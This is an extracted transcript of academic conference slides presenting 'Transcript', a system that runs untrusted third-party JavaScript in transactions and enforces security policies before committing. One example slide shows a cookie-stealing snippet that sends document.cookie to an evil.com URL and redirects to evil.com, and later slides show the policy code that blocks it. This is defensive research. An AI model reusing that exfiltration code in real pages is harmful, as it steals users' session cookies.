the case for javascript transactions mohan dhawan, chung-chieh shan, vinod ganapathy department of...
TRANSCRIPT
The Case for JavaScript Transactions
Mohan Dhawan, Chung-chieh Shan, Vinod GanapathyDepartment of Computer Science
Rutgers University
PLAS 2010
Problem Web applications include third party content
Examples: widgets, advertisements, libraries May contain untrusted, malicious JavaScript
April 18, 2023 2PLAS 2010
Example from nytimes.com Rouge third party advertisement
Displayed image of fake virus scan
Client security and privacy at risk
April 18, 2023 3PLAS 2010
Goal Protect Web application data by isolating
untrusted JavaScript code Must handle arbitrary 3rd party code written in
JavaScript Including constructs such as eval, this, with.
Must enforce powerful security policies Allow pop-ups from white-listed websites only.
April 18, 2023 4PLAS 2010
Outline Problem Transcript
Example Implementation Related Work Conclusion
April 18, 2023 5PLAS 2010
Solution: Transcript
Extend JavaScript to support Transactions Execute untrusted content speculatively
Commit changes after policy enforcement
Transaction
Web Application
April 18, 2023 6PLAS 2010
Transcript features Speculative execution of unmodified third
party JavaScript code
Suspend transactions on DOM and AJAX operations
Transactional execution of event handlers
April 18, 2023 7PLAS 2010
Schematic use of Transcript
// Web application code
var tx = transaction{
...
// unmodified 3rd party code
...
};
// Introspection block goes below
/* policy enforcement code */
// validate actions of the transaction
tx.commit();
//Rest of the Web application code
Transaction
WebApplication
April 18, 2023 8PLAS 2010
Outline
Problem Transcript
Example Implementation Related Work Conclusion
April 18, 2023 9PLAS 2010
Example: Untrusted code// Web application code
var tx = transaction{
var image =
document.createElement(‘img’);
var url =
"http://evil.com/grabcookie.php";
var params = document.cookie;
image.src = url + "?cookie=" + params;
document.body.appendChild(image);
...
window.location = "http://evil.com";
};
Transaction
WebApplication
April 18, 2023 10PLAS 2010
April 18, 2023 PLAS 2010 11
tx = transaction {...
body.appendChild(image);...
};
do {
...
tx = tx.resume();
...
} while(tx.isSuspended());
tx.commit();
Web application code…
…Rest of the Web application
read andwrite setscall stack
3rd party
Transaction object tx
web app
call stack3rd-party
……
resume
… …
call stack3rd party
1
2
3
tx’s writeset + Heaporig Heapnew=
4
12
3 4
5
read andwrite setscall stack
3rd party
Transaction object tx
web app
web app* web app*
Transcript runtime system
Introspection block
Transcript Runtime
On a transaction suspend, the Transcript runtime saves all the i) read write sets , andii) stack frames till the nearest transaction delimiter to create a Transaction objectTranscript runtime loads the savedread write sets and stack frames when the transaction resumes.
Transcript runtime applies the write set changes to the JavaScript heap when the transaction commits.
Transaction suspend and resume
TransactionWeb
Application
April 18, 2023 12PLAS 2010
var tx = transaction{
...
document.body.appendChild(image);
};
do{
var rs = tx.getReadSet(), arg = tx.getArgs();
switch(tx.getCause()) {
case "appendChild":
if (arg[0].nodeName.match("IMG") &&
!rs.checkMembership(document,"cookie"))
obj.appendChild(arg[0]);
break; }; /* end switch */
tx = tx.resume();
}while(tx.isSuspended());
if (arg[0].nodeName.match("IMG") &&
!rs.checkMembership(document,"cookie"))
obj.appendChild(arg[0]);
Policy
Read and Write Setsvar tx = transaction{
...
window.location = "http://evil.com";
};
/* Introspection Code */
var ws = tx.getWriteSet();
if(ws.checkMembership(window,"location")){
var loc = ws.getValue(window, "location");
if(!isWhiteListed(loc))
to_commit = false;
}
// Rest of the web application code
TransactionWeb
Application
var ws = tx.getWriteSet();
if(ws.checkMembership(window,"location")){
var loc = ws.getValue(window, "location");
if(!isWhiteListed(loc))
to_commit = false;
}
Policy
April 18, 2023 13PLAS 2010
Outline Problem Transcript
Example Implementation Related Work Conclusion
April 18, 2023 14PLAS 2010
Implementation Prototype implementation in Firefox 3.7a4 Added new JavaScript features
transaction keyword and Transaction object Modified interpreter op-codes to
Log all object accesses Suspend on DOM / AJAX calls
For details on semantics of the transactions, kindly refer the paper.
April 18, 2023 15PLAS 2010
Outline Problem Transcript
Example Implementation Related Work Conclusion
April 18, 2023 16PLAS 2010
Related Work Staged information flow in JavaScript: PLDI'09
hybrid framework for JavaScript with the aim of protecting Web applications from untrusted code
Conscript: S&P'10 aspect-oriented framework to specify and enforce fine-
grained security policies for Web applications
AdJail: USENIX Security'10 isolation mechanism to protect Web application content
from malicious advertisements
Caja, FBJS, AdSafe, etc.
April 18, 2023 17PLAS 2010
Conclusion
JavaScript transactions provide isolation Suspend operations that break isolation
Resume operation if web application allows
Enforcement of powerful security policies All data reads / writes are recorded Ability to inspect reads / writes before commit
No restriction or changes to third party code
April 18, 2023 18PLAS 2010
Questions ?
April 18, 2023 19PLAS 2010